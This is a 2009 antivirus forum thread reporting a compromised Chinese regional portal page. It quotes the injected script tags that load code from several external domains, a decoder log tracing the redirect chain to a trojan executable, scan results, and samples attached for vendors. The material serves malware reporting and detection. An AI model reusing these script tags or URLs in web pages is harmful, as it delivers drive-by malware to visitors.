
[Other] ChinaVnet (互联星空) Tibet welcome.xz.vnet.cn

qianwenxiang
Posted on 2009-4-16 21:30:00
Injected with:
<script src=http://bbg8.cn></script><script src=http://bbg8.cn></script><script src=http://bbg9.cn></script><script src=http://ccj3.cn></script><script src=http://ccj3.cn></script><script src=http://ccj5.cn></script>

The decoding output for one of them:

关于:hxxp://welcome.xz.vnet.cn/解密的日志(部分输出 -  17):
Level  1>http://ccj5.cn
Level  2>http://u.yrd9.cn/d1/16/index.htm
Level  3>http://u.yrd9.cn/d1/16/index2.htm
Level  4>http://u.yrd9.cn/d1/16/js.js
Level  5>http://u.yrd9.cn/d1/16/yt122121.htm
Level  6>http://u.yrd9.cn/d1/16/real1.js
Level  6>http://u.yrd9.cn/d1/16/real.js
Level  6>http://u.yrd9.cn/d1/16/turl.js
Level  7>http://d1.it3s5.com/01/x.exe
Level  5>http://u.yrd9.cn/d1/16/ytbf.htm
Level  5>http://u.yrd9.cn/d1/16/ytff.htm
Level  5>http://u.yrd9.cn/d1/16/ytgg.htm
Level  5>http://u.yrd9.cn/d1/16/ytxxz.htm
Level  5>http://u.yrd9.cn/d1/16/ytvod.htm
Level  5>http://u.yrd9.cn/d1/16/ytfl.htm
Level  5>http://u.yrd9.cn/d1/16/yt14.htm
Level  4>http://u.yrd9.cn/d1/16/ytqm.htm

日志由 Redoce1.9第36次修正版于 2009-4-16 21:14:35 生成。
悠柚
Posted on 2009-4-16 21:38:13
Starting the file scan:

Begin scan in 'D:\TDDownload\x.exe'
D:\TDDownload\x.exe
    [DETECTION] Is the TR/Crypt.XDR.Gen Trojan

Beginning disinfection:
D:\TDDownload\x.exe
    [DETECTION] Is the TR/Crypt.XDR.Gen Trojan
    [WARNING]   The file was ignored!


End of the scan: 2009年4月16日  21:38
Used time: 00:00 Minute(s)

The scan has been done completely.

      0 Scanned directories
      2 Files were scanned
      1 Viruses and/or unwanted programs were found
      0 Files were classified as suspicious
      0 files were deleted
      0 Viruses and unwanted programs were repaired
      0 Files were moved to quarantine
      0 Files were renamed
      0 Files cannot be scanned
      1 Files not concerned
      0 Archives were scanned
      1 Warnings
      0 Notes
悠柚
Posted on 2009-4-16 21:38:55
A2 with ik engine kill
Gen.Trojan!IK
幸福的猪猪
Posted on 2009-4-17 06:33:58

Reply to post #1 by qianwenxiang

x.exe   >kaba heur ,kaba kill !

hxxp://u.yrd9.cn/d1/16/js.js  >to kaba <Phishing Web Site>

x.zip

37.97 KB, downloads: 78

幸福的猪猪
Posted on 2009-4-17 07:09:22
kaba heur 2x,to kaba kill !

[ Last edited by 幸福的猪猪 on 2009-4-17 07:17 ]

TDDOWNLOAD.zip

75.68 KB, downloads: 82

shine
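Posted on 2009-4-17 20:53:35
Micropoint (微点) + Filseclab (费尔) + Fengyun (风云): no reaction; the browser reports that the page cannot be displayed properly and contains errors.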

Copyright © KaFan  KaFan.cn All Rights Reserved.
